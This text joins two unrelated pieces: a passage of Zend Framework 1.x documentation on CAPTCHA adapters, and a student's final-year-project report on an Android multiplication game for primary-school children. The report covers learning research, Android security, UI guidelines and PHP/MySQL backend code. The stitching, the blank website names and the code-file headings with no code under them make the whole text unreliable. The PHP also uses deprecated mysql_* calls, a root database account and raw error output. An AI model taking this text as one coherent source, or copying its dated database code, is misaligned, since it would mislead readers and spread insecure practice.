Note: Zend_Captcha_Word is an abstract class and may not be instantiated directly.

Zend_Captcha_Dumb

The Zend_Captcha_Dumb adapter is mostly self-descriptive. It provides a random string that must be typed in reverse to validate. As such, it's not a good CAPTCHA solution and should only be used for testing. It extends Zend_Captcha_Word.

Zend_Captcha_Figlet

The Zend_Captcha_Figlet adapter utilizes Zend_Text_Figlet to present a figlet to the user. Options passed to the constructor will also be passed to the Zend_Text_Figlet object. See the Zend_Text_Figlet documentation for details on what configuration options are available.

Zend_Captcha_Image

The Zend_Captcha_Image adapter takes the generated word and renders it as an image, performing various skewing permutations to make it difficult to automatically decipher. It requires the » GD extension compiled with TrueType or Freetype support. Currently, the Zend_Captcha_Image adapter can only generate PNG images.

Zend_Captcha_Image extends Zend_Captcha_Word, and additionally exposes the following methods:

- setExpiration($expiration) and getExpiration() allow you to specify a maximum lifetime the CAPTCHA image may reside on the filesystem. This is typically longer than the session lifetime. Garbage collection is run periodically each time the CAPTCHA object is invoked, deleting all images that have expired. Expiration values should be specified in seconds.
- setGcFreq($gcFreq) and getGcFreq() allow you to specify how frequently garbage collection should run. Garbage collection will run every 1/$gcFreq calls. The default is 100.
- setFont($font) and getFont() allow you to specify the font you will use. $font should be a fully qualified path to the font file. This value is required; the CAPTCHA will throw an exception during generation if the font file has not been specified.
- setFontSize($fsize) and getFontSize() allow you to specify the font size in pixels for generating the CAPTCHA. The default is 24px.
- setHeight($height) and getHeight() allow you to specify the height in pixels of the generated CAPTCHA image. The default is 50px.
- setWidth($width) and getWidth() allow you to specify the width in pixels of the generated CAPTCHA image. The default is 200px.
- setImgDir($imgDir) and getImgDir() allow you to specify the directory for storing CAPTCHA images. The default is "./images/captcha/", relative to the bootstrap script.
- setImgUrl($imgUrl) and getImgUrl() allow you to specify the relative path to a CAPTCHA image to use for HTML markup. The default is "/images/captcha/".
- setSuffix($suffix) and getSuffix() allow you to specify the filename suffix for the CAPTCHA image. The default is ".png". Note: changing this value will not change the type of the generated image.

All of the above options may be passed to the constructor by simply removing the 'set' method prefix and casting the initial letter to lowercase: "suffix", "height", "imgUrl", etc.

Zend_Captcha_ReCaptcha

The Zend_Captcha_ReCaptcha adapter uses Zend_Service_ReCaptcha. setService(Zend_Service_ReCaptcha $service) and getService() allow you to set and get the ReCaptcha service object.
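For illustration, the image adapter options above might be combined as follows. This is only a sketch: the font path is a placeholder that you must replace with a real TrueType font on your system.

```php
<?php
require_once 'Zend/Captcha/Image.php';

$captcha = new Zend_Captcha_Image(array(
    'wordLen' => 6,                      // length of the generated word
    'timeout' => 300,                    // session TTL in seconds
    'font'    => './fonts/example.ttf',  // required; placeholder path
    'height'  => 50,
    'width'   => 200,
    'imgDir'  => './images/captcha/',
    'imgUrl'  => '/images/captcha/',
));

$id = $captcha->generate(); // renders the PNG and returns the token id
```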
http://framework.zend.com/manual/1.8/en/zend.captcha.adapters.html
Teach Me Maths Android Application Computer Science Essay

The aim of this project is to develop a mobile application to support learning of multiplication/division among Primary school children. The application will be focused on Multiplication and Division. I hope to use research into Learning Styles and Cognitive Styles to design an interactive Application which will help improve children's numeracy skills and support the cognitive processes of children. Cognition describes an individual's typical or habitual mode of problem solving, thinking, perceiving and remembering (Cassidy, 2004). The application will be targeted at 3rd and 4th class children and will be developed for the Android platform.

A scenario where this application could be useful would be on a car journey. Parents are driving a car with children in the backseat. Instead of the children being bored during the journey or playing some video games, the parents can give the kids their phones to use the app. This way the parents will be happy that their children are learning for the duration of the journey. The children will also benefit from this as they will be improving their numeracy skills.

I also believe that this project could be useful in the school environment. Teachers will be able to give their students homework through the app and monitor student progress through their scores.

1.2 Concept of the Application

The name of the Application will be 'Buzz-Bang'. It will use Cognitive methods combined with Gamification to provide an interactive educational experience to the user. The game should help develop the 'step-counting' technique for multiplication. In the game, the user will be shown three numbers: A, B, and C. The user will have to perform two calculations in order to determine the correct answer.
There are three possible answers for the user to choose from: 'Buzz', 'Bang', and 'Buzz-Bang'. If A is a multiple of C, the user should push the 'Buzz' button. If B is a multiple of C, the user should push the 'Bang' button. If both A and B are multiples of C, then the user should push the 'Buzz-Bang' button.

In the test section of the game, the user's score will be calculated throughout the round and presented to them at the end of the round, along with their high score and their average score. No help will be available to the user in this section. The game will also have a practice section which allows the user to play the game without having his/her score recorded. The user will have access to help in this section relating to the question they are on. If the user answers a question incorrectly, then they will be shown the help section before attempting the question again.

The game will have different levels of difficulty. In the beginners' level, the user will have to calculate multiples of 1, 2, 5 and 10. In the intermediate level, users will have to calculate multiples of 1, 2, 3, 4, 5, 6 and 10. In the advanced level, users will have to calculate multiples of all numbers from 1-12. Users should be able to achieve high scores at one level before moving on to the next level. Users will be able to keep track of their overall stats and progress in the user profile section of the application.

1.3 Technologies used in the project

In order to develop my Android application I will have to utilize a number of different technologies. An important part of my project was to understand and implement these technologies correctly. All Android applications are developed in the Java programming language. XML files are used to define the structure of the User Interface. I will develop my application using the Eclipse IDE along with the ADT (Android Development Tools) plug-in. This plug-in extends Eclipse, allowing Android projects to be created in the Eclipse environment.
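Since the app's logic will be written in Java, the Buzz-Bang answer rule from section 1.2 can be sketched as follows (illustrative only; the class and method names are my own, not from the project):

```java
public class BuzzBang {
    // 'Buzz' if A is a multiple of C, 'Bang' if B is, 'Buzz-Bang' if both.
    // Well-formed questions are assumed to always have one of these answers.
    static String correctAnswer(int a, int b, int c) {
        boolean buzz = a % c == 0;
        boolean bang = b % c == 0;
        if (buzz && bang) return "Buzz-Bang";
        if (buzz) return "Buzz";
        if (bang) return "Bang";
        return "none"; // should not occur for a well-formed question
    }
}
```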
Since my application will require users' data to be stored, the Android device will have to communicate with a remote server, sending and receiving user data over the internet. This means that several more technologies will be used in the development of my application. I will use a WAMP server to store the required data. WAMP (Windows, Apache, MySQL, PHP) provides an environment for developing projects using MySQL and PHP. For my application I will store user details in a MySQL database. Since Android devices cannot connect to MySQL databases directly, I will write PHP classes which connect to the database, retrieve information from the database, and update the database when required. The data will be transferred from the database to the Android device in JSON format. JSON is a format for storing and transferring text information. In order to connect to the database, my application will send a request to a PHP class. The PHP class will carry out the required operation and return data to the application.

1.4 Methodology

I used the following methodology while carrying out research for the project. The first step was to identify the relevant reading resources. For this I searched Google Scholar, which allows you to search for scholarly literature from many sources. The University of Limerick library and CAL (Computer Aided Learning) also provided me with some useful articles. Once I had identified the relevant material I began my literature review. For each article I wrote a brief introduction, a summary of the key findings, and a conclusion on how these findings could be useful for my FYP.

Since I had no experience developing for the Android platform, I began a series of tutorials which gave me a good introduction to the development process. The tutorials were from the website '' who give free educational tutorials on a wide range of topics.
While these tutorials were useful, I also used other sources to develop my Android application development skills, such as '' and ''. The book 'Beginning Android' by Grant Allen was also a good source of material for me. Once I felt comfortable with Android development, I focused on the design and implementation of my application. This will be discussed further in chapter three of this report.

1.5 Objectives of my FYP

There are a number of objectives that I wish to achieve in my final year project. I hope to gain an understanding of different learning styles and cognitive models that can affect a child's development. I also hope to research the different challenges that face children who are learning mathematics. I will use this research to design an application which supports these education techniques.

I hope to develop a better understanding of the Android development environment. Since Android development is centred on the Java programming language, I hope to implement what I have learned about Java in university in my FYP. I have no previous experience of Android development, so this will be an excellent opportunity to learn a new skill which is becoming more and more important as smartphones grow more popular.

I will learn about relational database management system (RDBMS) techniques, and use technologies such as MySQL, WAMP, JSON and PHP to utilise RDBMS in my Application.

I will evaluate a number of applications which are already on the market using relevant guidelines. By evaluating these applications I will be able to design a better application myself. I will take the positive features of the existing applications and try to implement some of them while avoiding the negative aspects of the applications.

I will carry out research into the benefits of gamification of education. There is a lot of research going on in this area at the moment. If I feel that gamifying the application will help with cognitive learning then I will include it in my application.
I hope to implement all of the findings of my research in the Android Application. The design should succeed in meeting the cognitive needs of children.

1.6 Overview of my report

This report contains details of my Final Year Project. Chapter 1 gives a brief introduction to the Project, outlining the Project's concept, requirements, and objectives. Chapter 2 will contain details of the research carried out into learning styles, cognitive learning, the difficulties of learning mathematics, gamification, and Android development. In Chapter 3, I will discuss the design and implementation of my Application. In Chapter 4, I will evaluate the finished application. Finally, in Chapter 5, I will discuss possible future work which could be carried out on my project, as well as giving a summary of my achievements in the project.

Chapter 2

2.1 Introduction

In the following chapter I will discuss the key findings of my research. I identified several topics which were relevant to my project, and found numerous articles based on these. The main subjects I was interested in were learning styles/cognition, mathematics, gamification and Android development.

2.2 Learning Style/Cognition

Since my Android application will be aimed at supporting children's educational needs, I wanted to find out about different learning styles and how these can impact a child's progress in education. Somebody's learning style is the way that he/she chooses to approach a learning situation. This has an impact on his/her performance while learning and also impacts the outcome of the learning. There are a number of important concepts in the field which need to be understood. A person's cognitive style is a person's natural style of problem solving, thinking, and remembering. A person's learning style describes how a person can apply their cognitive style to a learning situation. A person can adopt different learning strategies to deal with different types of tasks.
Cognitive styles are seen as being more automatic and natural than learning styles. Learning preferences are defined as favouring one method of teaching over another (such as group work over independent work).

There are two main theories about the cognitive processes involved in children's mathematical learning. The first theory stresses the importance of the numerical procedures that children have to learn at the start of their mathematical career at school, without referencing their understanding of quantities or relations. However, there is evidence that shows children cannot use these procedures without fully understanding their connection with quantities. This shows that learning about numbers themselves is not sufficient for learning mathematics. The second theory focuses on the importance of children's reasoning about quantities and relations for mathematical learning, and assigns numerical procedures to a secondary role.

I wanted to see how these concepts could be applied to children learning mathematics. Children's success in learning mathematics varies a great deal from child to child. We must consider what underlying skills determine how well children do in mathematics: for example, can a child take in and remember mathematical information well, calculate efficiently, and reason logically? Finding answers to these questions should allow better systems for teaching mathematics to be devised.

Learning mathematics in primary school involves learning about numbers, quantities and relations, and about the connections and distinctions between these concepts. Quantities and numbers are not the same. A quantity can be represented by a number, but we do not always need to measure a quantity to represent it by a number. Relations have a converse (greater than/less than/etc.). In order to learn mathematics, children must be able to coordinate their understanding of quantities with their understanding of relations, and must also be able to distinguish between them.
Children can truly understand the meaning of numbers only when they understand, for example, that all sets with the same number of objects are equivalent, and that if two sets are equivalent they necessarily have the same number of objects. They also need to understand that you only change the number in a set if you add or subtract elements.

Studies (Nunes, Bryant, Sylva and Barnes (2009)) have shown that the relation between mathematical reasoning and mathematical achievement is evidence that children need to spend time learning what quantitative relations are and how to reason about them logically and enterprisingly. Children's ability both to calculate and to reason about mathematical relations when they were 7/8 years old played a key role in their mathematical achievement over the next 5 years, and the contribution made by the children's ability to reason mathematically was far greater than the contribution made by their ability to calculate.

2.3 Step Counting

One method which is being used to teach multiplication is known as 'step-counting'. This is the favoured method of the 'Project-Maths' curriculum for teaching multiplication to children. From emails with 'Project-Maths' I learned that students going into secondary school are not as comfortable with step-counting as they should be. In 'step counting' a multiplication sum is worked out by counting up in steps. For the sum (5*6), the answer is found by counting 6…12…18…24…30.

'Step-counting' is a good technique to use when teaching because errors in multiplication usually stem from mistakes made in written calculation. These mistakes are normally caused by following an incorrect or faulty procedure. Even if a student is following an incorrect method, they will assume that the answer they get is correct. However, if a student works through the sum with step-counting, he is more likely to get the correct answer.
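The step-counting idea can be expressed directly in code (a sketch of my own, not taken from the curriculum materials): the product 5 * 6 is reached by taking 5 steps of size 6.

```java
public class StepCounting {
    // Computes steps * stepSize by counting up: 6, 12, 18, 24, 30 for 5 * 6.
    static int stepCount(int steps, int stepSize) {
        int total = 0;
        for (int i = 0; i < steps; i++) {
            total += stepSize;
        }
        return total;
    }
}
```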
Using this technique will give children a deeper knowledge of multiplication, and an awareness of modifications that they could make to numbers in a calculation which would still give them the same result. They will understand, for example, that 3 + 1 + 1 + 1 is the same as 3 * 2. Children will also be able to work out more complex problems by splitting them up into smaller problems. Initially children should be able to derive multiples of 2, 5, and 10. Once they are comfortable with this they should be moved on to multiplication facts for 2, 3, 4, 5, and 6. After this stage they progress on to higher numbers.

2.4 Gamification

In recent years the potential of using gaming in education has become a much discussed topic. Gamification is the incorporation of game elements into non-game settings. In education, it attempts to use the motivational power of games to solve problems with student motivation and engagement. Something about the typical learning environment fails to engage students: lessons are not usually regarded as playful experiences, whereas video games and virtual worlds excel at engagement. In order to understand the potential of gamification, we need to consider how its techniques can be deployed effectively in practice. There are two major areas where gamification can be useful:

Cognitive: Games guide players through a process and keep them engaged with potentially difficult tasks. One critical game design technique is to deliver concrete challenges that are perfectly tailored to the player's skill level, increasing the difficulty as the player's skill expands. Specific, moderately difficult, immediate goals are motivating for learners, and these are precisely the sort that games provide. In the best designed games, the reward for solving a problem is a harder problem. This supports motivation and engagement, and these techniques can transform student perspectives on learning.
Emotional: Games can provide positive emotional experiences such as optimism and pride. They can also help players persist through negative experiences and turn them into positive ones. Games often involve failure and may require the player to fail multiple times, learning something each time; they allow players to keep trying until they succeed, and to risk very little by doing so. With traditional learning, the stakes of failure feel much higher and cause students anxiety. Games instead offer a feeling of anticipation around the chance to fail and overcome failure: they portray failure as a necessary part of learning, and create an environment where effort is rewarded.

Risks and Benefits

Gamification can motivate students and get them to apply themselves fully in learning environments. It can show students that education can be a more informal, enjoyable experience. Since games have clear objectives and give instant feedback to the player, players can change how they play in order to improve and reach the objectives. This also applies to students, who will improve their work when given constructive feedback.

2.5 Introduction to Android

Android is an operating system for mobile phones based on the Linux platform. It delivers a complete set of software for mobile devices: an operating system, middleware, and key mobile applications. It was primarily designed for touchscreen mobile devices such as smartphones and tablets. Android provides an open platform for developers to create their own applications for use on various mobile devices. While Android is currently developed by Google, it was not originally created by them. Android Inc. was a start-up company working on new software for smartphones; Google bought Android Inc. in 2005 and was ready to release the first Android device in late 2008. The different components of Android are designed as a stack, and Android applications form the top layer of the stack.
The Linux kernel forms the bottom layer. Applications are written in the Java programming language. The application architecture is designed to simplify the reuse of components: the capabilities of any application can be published and then made use of by other applications. Android includes a set of core libraries that provides most of the functionality available in the core libraries of the Java programming language. Applications can call upon any of the phone's core functionality, such as making calls, sending text messages, or using the camera; these facilities provide the functionality needed to build quality mobile applications. Android relies on Linux for core system services such as security, memory management, and process management.

The recommended Android development environment is the Eclipse IDE. An ADT (Android Development Tools) plug-in is available for Eclipse, which extends its capabilities to allow new Android projects to be created. It can create application UIs, debug applications using the Android SDK tools, and export .apk files for distributing applications. The Android SDK (Software Development Kit) provides the API libraries and tools necessary for Android development. Android allows developers to combine information from the web with data on the phone to provide a more relevant, innovative user experience. Since Android is open source, it can be extended to incorporate new technologies as they emerge, and as developers continue to build innovative mobile applications, the platform will continue to evolve.

By the end of 2011, more than 200 million Android devices had been activated around the world, with an estimated 555,000 devices being activated each day. These figures show that Android was quickly catching up with Apple's iOS platform, and most reports now show that Android is the dominant smartphone platform: data from the third quarter of 2012 showed Android with 75% of smartphone market share.
2.6 Designing, Developing, and Using Secure Mobile Applications

Developing mobile applications and their corresponding mobile web services is quite different from developing traditional web services and desktop-oriented applications, due to the limited resources available (CPU, memory, battery, etc.) and communications aspects (connection availability, security, etc.). Before mobile applications can be adopted at large scale and for heavy transactions, plenty of technical aspects have to be addressed. Transaction-related data should always be accessible to mobile applications. This accessibility is mainly affected by three factors:

1. Availability of connections between mobile applications and mobile web services,
2. Available bandwidth, and
3. Network latency.

If there is no connection, data should be stored locally; as soon as a connection is available, offline transactions and data must be updated and committed. Optimizing the transfer of data means deciding how much data should be located on the device and how much should travel back and forth between the application and the mobile web service. The main problem that arises is how to decide which data to keep remote and which to bring to the mobile device. Decision criteria include available resources, cost of storage, cost of communication, significance and sensitivity of data, security, and the costs and benefits of compression. Because of this, developers need to consider a number of issues when developing an application:

How to present the user interface?
How to support offline operations?
How to deal with limited bandwidth?
How to hide high and unpredictable latency?
How to ensure security?
How to ensure browser compatibility?
How to decide on local or remote computation?
How to adapt mobile web services?

To solve these issues the following framework could be applied.
The framework involves two main participants: the mobile client environment, and the backend server/mobile web service. The backend server consists of eight components:

Enterprise Web Applications: integrate functionality from remote servers.
Business Logic: represents the core of the mobile application that exposes functionalities.
Content Management System: a system to manage different contents and data, including importing, creating, updating and removing content to/from the mobile application.
Workflow and Profile Management: manages the flow of data between the mobile application and the backend server, and adapts the mobile application's features and interface to different users' profiles.
User Management: allows management of different types of users with different levels of access.
Database: used to store data about objects and content.
Web Services: web components that can be deployed on the backend server and invoked by the mobile application.
Document Repository: used to store different types of documents.

The mobile client environment consists of six components:

Business Logic: it may be necessary to run some of the business logic on the application itself (e.g. when it is offline).
Secure Layer Interfaces: handles secure user authentication and provides different interfaces for different users' profiles.
Mobile Application APIs: a set of libraries implementing utilities that may be required by the mobile application.
User Interface: the GUI components that mobile clients use to access different services.
Data Storage: the place where persistent data is stored.
Browser: used to display web content.

2.7 Android Security

Since my application will contain some personal information about children through their profiles, security is an important issue to consider. Parents and teachers will not feel comfortable allowing children to use an application which does not keep students' information safe.
Android uses a simple permission-label assignment model to restrict access to resources and components, and several refinements have been added to the system as it has evolved. In the Android application framework, developers must design applications in terms of components; the framework doesn't have a main() function or a single point of entry. Android defines four component types: activity components, service components, content provider components, and broadcast receiver components.

Activity components define an application's user interface; usually, one activity is defined per "screen". Activities start each other and can pass in/return values. For example, Facebook allows the use of the camera app to upload photos. Service components perform background processing: if an activity needs to perform an operation after its user interface disappears, it can start a service specifically designed for that action. Content provider components store and share data using a relational database interface; each content provider has an associated "authority" describing the content it contains. Broadcast receiver components act as mailboxes for messages from other applications. Application code often broadcasts messages to an implicit destination, and broadcast receivers subscribe to such destinations to receive the messages sent to them. Application code can also address a broadcast receiver explicitly by including the namespace assigned to its containing application.

The primary mechanism for component interaction is an 'intent'. An intent is a message object containing a destination component address and data. The Android API defines methods that accept intents and use this information to start activities and services and to broadcast messages (startActivity(Intent), sendBroadcast(Intent)). The invocation of these methods tells the Android framework to begin executing code in the target application.
This process is known as an action (an intent object defines an "intent" to perform an "action"). Android protects applications and data through a combination of two enforcement mechanisms, one at the system level and the other at the inter-component communication (ICC) level. ICC mediation builds on the guarantees provided by the underlying Linux system. Each application runs with a unique user identity, which lets Android limit the potential damage of programming flaws. Access to each component is restricted by assigning it an access permission label, while developers assign each application a collection of permission labels. When a component initiates ICC, a reference monitor looks at the permission labels assigned to the calling application: if the target component's access permission label is in that collection, ICC establishment is allowed to proceed; if not, establishment is denied. The developer assigns permission labels via the XML manifest file that accompanies every application, which defines the application's security policy. Assigning permission labels to an application specifies its protection domain, whereas assigning permissions to the components in an application specifies an access policy to protect its resources. All permission labels are set at install time.

Several refinements have been made to the basic Android security model as the system has evolved. Applications often contain components that another application should never access. Instead of defining an access permission, the developer can make such a component private; the developer then doesn't have to worry about which permission label to assign it or how another application might acquire that label. The developer of an activity can also decide not to assign an access permission to it: if a public component doesn't explicitly have an access permission assigned, any application can access it.
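The label-checking rule just described can be modelled in a few lines of Java. This is a hypothetical toy sketch of the idea, not Android's actual implementation: ICC succeeds when the target component is unprotected (no label assigned) or when its label appears in the calling application's granted collection.

```java
import java.util.Set;

// Toy model of Android's permission-label reference monitor: ICC from a
// caller to a target component is allowed only if the component's access
// permission label is among the labels granted to the calling application,
// or if the component has no label at all (a public, unprotected component).
// Names and labels here are illustrative, not real Android APIs.
public class ReferenceMonitor {

    public static boolean allowIcc(Set<String> callerLabels, String targetLabel) {
        if (targetLabel == null) {
            return true; // no access permission assigned: any application may call
        }
        return callerLabels.contains(targetLabel);
    }

    public static void main(String[] args) {
        Set<String> caller = Set.of("FRIEND_VIEW", "INTERNET");
        System.out.println(allowIcc(caller, "FRIEND_VIEW")); // true: label granted
        System.out.println(allowIcc(caller, "CONTACTS"));    // false: establishment denied
        System.out.println(allowIcc(caller, null));          // true: unprotected component
    }
}
```

The final case in main mirrors the point made above: leaving a public component without an access permission means any application can reach it.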
While this supports the reuse of functionality, it can lead to poor security practice: unprotected intent broadcasts can unintentionally leak information to explicitly listening attackers. The Android API for broadcasting intents therefore optionally allows the developer to specify a permission label to restrict access to the intent object. Some system resources (camera, microphone, etc.) are accessed through direct API access rather than through components. Android protects these APIs with additional permission label checks: an application must declare a corresponding permission label in its manifest file to use them (e.g. declare the INTERNET permission label).

There are four protection levels for permission labels in Android. "Normal" permissions are granted to any application that requests them in its manifest. "Dangerous" permissions are granted only after user confirmation. "Signature" permissions are granted only to applications signed by the same developer key as the package defining the permission. "Signature or System" permissions act like "signature" permissions, and exist for compatibility with older Android systems.

2.8 UI DESIGN GUIDELINES

There are a number of guidelines that should be followed when designing a user interface for a mobile application:

Enable Frequent Users to Use Shortcuts
Since time is often a key factor for the user, reducing the number of operations required to perform regular tasks is an important part of the design process. This will increase the speed of interaction between the user and the system.

Offer Informative Feedback
For every operation by the user, there should be some system feedback. The feedback should be both informative and understandable.

Support Internal Locus of Control
It is important that the user feels like they are in control of the system. Mobile applications should be designed so that they respond to the users' actions rather than controlling them.
Consistency
Users may need to switch between mobile devices, and it is important that consistency is maintained between all devices, across multiple platforms.

Reversal of Actions
Reversing an action and returning to a previous state can be a challenging process for a mobile application to achieve due to the limited memory and computing power available.

Error Prevention and Simple Error Handling
Error prevention needs to be aware of the physical attributes of mobile devices. Many of these devices have very small buttons in close proximity to each other, which can cause problems for users. Error handling is very important given the pace of events on mobile devices.

Reduce short-term memory load
Often while using a mobile device, the user will not be 100% focused on the application. Interfaces should be designed so that the user does not need to memorise anything in order to complete the task.

Design for multiple and dynamic contexts
There are often other distractions vying for a user's attention when using mobile applications. Environmental conditions or the presence of other people can alter how a user interacts with the device. It is important to allow for different operations in various contexts: by implementing context awareness and self-adapting functionality, the usability of the application is increased.

Design for Limited and Split Attention
Since a mobile application may not be the focal point of the user's current activities, it is important to design an interface which requires as little attention as possible to use.

Design for speed and recovery
Time constraints need to be taken into account when designing a mobile application. Users may need to quickly access other applications; when this happens, the user's work will need to be saved quickly and securely for later use.

Allow for personalization
Different users may have different preferences and skill levels when it comes to using an application.
It is important to allow for variation and personalization of the application for things such as backgrounds or font sizes.

Design for Enjoyment
Aesthetics is also an important aspect of the design of a user interface. Colour is important for visual interfaces and can help invoke a positive response from the user.

2.9 Evaluation of existing apps

Before I began to design my application I wanted to evaluate some of the educational apps already on the Google Play store, as I felt this would give me some good ideas for designing my own application. I evaluated the applications based on the guidelines discussed in section 2.8. This was a beneficial exercise: it showed me some features which I could implement in my own design, some features which should be avoided, and some good ideas relating to the layout and structure of my application. I also had to consider how I would design my application so that it would be an improvement on existing applications.

The first application I looked at was called 'Multiplication Tutor', which aims to help 'Learn and Practice Multiplication Tables'. The first thing I noticed was that the background of the main menu seemed dark and cluttered, and it is not obvious to the user which option to take to begin using the application. Another drawback is that you have to push a 'next' button to get to the next question; this should happen automatically when a correct answer is given. There is no constructive feedback given: the user is only told if he/she is correct or incorrect.

The next application I looked at was 'Kids Numbers and Math', which is described as 'A fun way for kids to learn numbers and build basic math skills'. This application is aimed at pre-school children learning basic maths skills. Any child using this application needs to be registered by a parent/guardian, which allows the parent/guardian to track the progress of the child.
Feedback about each child is given in the 'parents centre'. Users can also play as a guest. This application has a bright, colourful background which is easy to focus on.

The final application I evaluated is 'Learn & Fun for Kids', which is described as 'Possibly the best and most complete educational game for Android'. This application doesn't just focus on maths, but teaches the alphabet, shapes and colours as well. On the home screen I found that the buttons did not stand out and it was not clear which option to take. A positive feature of this application is that it allows for personalization of backgrounds and background music. The application also keeps track of the high scores achieved by the user.

[Screenshots of the evaluated apps omitted: Multiplication Tutor, Kids Numbers and Math, Learn & Fun for Kids]

Chapter 3 - Design and Implementation

Once I had completed my research and decided on a concept for my application, I began to think about its design. The Android developer guide gives some guidelines on mobile application design.

3.1 Screen Navigation Design

According to the official Android developer guide, 'One of the very first steps to designing and developing an Android application is to determine what users are able to see and do with the app'. With this in mind I started to plan out the high-level screen hierarchy of my application. I began by deciding on the set of screens which would be needed to allow users to view and interact with the application correctly. The set of screens I decided on were:

Home Page Screen: This page will contain the application's home menu.
Play Screen: This is the screen the user will see when playing a game.
Practice Screen: This is the screen that the user will see when practising the game.
Help Screen: If a user requires help in a practice game, this screen will appear.
Instructions Screen: This screen will show the user how the game works.
Log-in Screen: This screen will allow the user to log in to his/her account.
Set-up Account Screen: This screen will allow a user to create a user account.
User Menu Screen: This menu allows the user to play/practise while logged in, as well as the option to view their statistics to date. This screen also allows the user to log out.
User Statistics Screen: This screen will show the user statistics from their previous games.
Score Screen: This screen tells the user what score they got in their previous game and allows them to return to the User Menu Screen.

Once I had decided on the screens, I defined the relationships between them in a screen map. This allowed me to see how the different components of the application would interact with each other.

[Hand-drawn screen map omitted]

The next part of the design process was wireframing, which involved sketching the layout of each screen by hand. At this early point in the process precision was not important, but drawing these rough sketches gave me a better understanding of how users would interact with the application, as well as making me consider the practicality of my original screen map design.

[Hand-drawn wireframe sketches omitted: Home Menu, Account Screen, Log-in Screen, Set-up Account, User Menu, Play Screen, Practice Screen, Help Screen, Instructions Screen, Score Screen, Statistics Screen]

Once I had these screens designed, I was able to start writing code. While the screen design was not final, it gave a good basis to begin implementation, and allowed for refinement at a later stage.

3.2 Database Design

A key requirement for my Android application was the ability to keep track of a user's details and scores. This meant that I needed a database storing this information, which an Android device could connect to, retrieve data from, and update user information on.
Since Android cannot connect directly to a database server, I had to create a PHP API which carries out operations on the database and returns a response to the Android application. All data is transferred between the database and the Android device in JSON format; JSON is a format for storing and transferring text information.

The first step in designing my database was to set up a web server which would host the required tables, as well as the PHP API. For my project I felt that a WAMP server would work well. WAMP stands for Windows, Apache, MySQL and PHP; it provides an environment for developing applications with PHP and MySQL on an Apache web server. I created a simple database with only one table to store information from the application. The 'user_details' table contained columns representing the user's username, password, number of games played, average score, and high score. I created the 'user_details' table using a MySQL CREATE query.

Once my database was created, I created two PHP classes which would be used to connect to the database. The class 'db_config.php' contained the variables required to open a connection with the database. The class 'db_connect.php' imported the variables from 'db_config.php' and used them to open a connection with the database.

db_config.php

<?php
define('DB_USER', "root");          // db user
define('DB_PASSWORD', "********");  // db password
define('DB_DATABASE', "fyp");       // database name
define('DB_SERVER', "localhost");   // db server
?>

db_connect.php

<?php
class DB_CONNECT {

    // constructor
    function __construct() {
        // connecting to database
        $this->connect();
    }

    // destructor
    function __destruct() {
        // closing db connection
        $this->close();
    }

    /**
     * Function to connect with database
     */
    function connect() {
        // import database connection variables
        require_once __DIR__ .
'/db_config.php';

        // connecting to mysql database
        $con = mysql_connect(DB_SERVER, DB_USER, DB_PASSWORD) or die(mysql_error());

        // selecting database
        $db = mysql_select_db(DB_DATABASE) or die(mysql_error());

        // returning connection cursor
        return $con;
    }

    /**
     * Function to close db connection
     */
    function close() {
        // closing db connection
        mysql_close();
    }
}
?>

Having established a connection to the database, I needed to create PHP classes which would perform different operations on the table in my database. The first operation I needed was to create new users. The 'create_user.php' class connects to the database using 'db_connect.php' before inserting a new row into the 'user_details' table. When there is a problem inserting a row into the table, the class returns an error specifying the problem.

create_user.php

There were still a number of operations which I would need carried out on my database. To meet the requirements of the game, the 'user_details' table would need to be updated regularly so that the user's statistics stay up to date. I solved this by adding more classes to the PHP API. My 'get_user_details.php' class is used to get the information required in the game's statistics screen, 'update_user.php' is used to update the row relating to a particular user, and 'get_highscore.php' is used to get a particular high score.

get_highscore.php
get_user_details.php
update_user.php

3.3 Game Development

There were a number of different areas for me to consider while developing this game. I had to develop the core functionality of the game, such as generating questions, calculating the correct answer, keeping track of scores, providing help in the practice section, and allowing for different levels of difficulty. I had to ensure that the screen layout and UI components were consistent with the original design of the game as shown in section 3.1, without compromising the core functionality.
I also had to integrate the remote web server and the PHP API (discussed in section 3.2) with my application.

3.3.1 Generating Maths Questions

In order for the application to meet its requirements, I had to develop a solution which generated random questions for various levels of difficulty. To achieve this I implemented the state design pattern, which allows objects to change their behaviour depending on internal state. I utilised this pattern as it would allow the application to generate different questions depending on the difficulty level chosen. I created a 'PlayLevel.java' class which contained a number of different internal states, each representing a different level of difficulty. My 'PlayState.java' class defined a common interface for the various levels, encapsulating their behaviour. When 'PlayLevel.java' changed state, it had a different level associated with it, causing a different set of questions to be generated.

PlayState.java
BeginnerLevel.java
PlayLevel.java (sample section of the class)

Another challenge that I faced was keeping track of which question the user is on and of their current score. Keeping track of the question was of particular importance in the practice section of the game: if a user got a question wrong and required help from the help section, it was important that they attempted the same question again afterwards. If the game generated a new question in the practice section after offering help, the user would not improve their learning skills. To solve this I utilised Android's Application class, which allows an object to maintain global application state. This meant that I could keep track of game details even when the application was moving between different activities. I created a 'BuzzBangApp.java' class which extended the Android Application class.
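The state-pattern question generation and the question/score tracking described in this section could be sketched together as follows. The class names mirror those mentioned above (PlayState, BeginnerLevel, PlayLevel), but the method bodies and the level rules are illustrative assumptions, not the project's actual code:

```java
import java.util.Random;

// Each difficulty level is a state implementing a common interface.
interface PlayState {
    int[] nextQuestion(Random rng); // returns {a, b} for the sum a * b
}

// Assumed rule: beginners practise multiples of 2, 5 and 10 (see section 2.3).
class BeginnerLevel implements PlayState {
    private static final int[] TABLES = {2, 5, 10};
    public int[] nextQuestion(Random rng) {
        return new int[]{rng.nextInt(10) + 1, TABLES[rng.nextInt(TABLES.length)]};
    }
}

// Assumed rule: higher levels draw both operands from 2..12.
class AdvancedLevel implements PlayState {
    public int[] nextQuestion(Random rng) {
        return new int[]{rng.nextInt(11) + 2, rng.nextInt(11) + 2};
    }
}

// Context object: changing its state changes which questions are generated.
// It also tracks the current question and score, so that (as in the practice
// mode described above) a wrong answer keeps the same question pending.
public class PlayLevel {
    private PlayState state = new BeginnerLevel();
    private final Random rng = new Random();
    private int[] current;   // question currently being attempted
    private int score = 0;

    public void setState(PlayState s) { state = s; }

    public int[] question() {
        if (current == null) current = state.nextQuestion(rng);
        return current;      // same question until answered correctly
    }

    public boolean answer(int value) {
        boolean correct = value == current[0] * current[1];
        if (correct) { score++; current = null; } // only then move on
        return correct;
    }

    public int score() { return score; }
}
```

Usage would be: call question() to fetch the pending sum, answer() with the user's value, and setState(new AdvancedLevel()) to switch difficulty; the repeat-on-wrong behaviour falls out of only clearing the current question on a correct answer.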
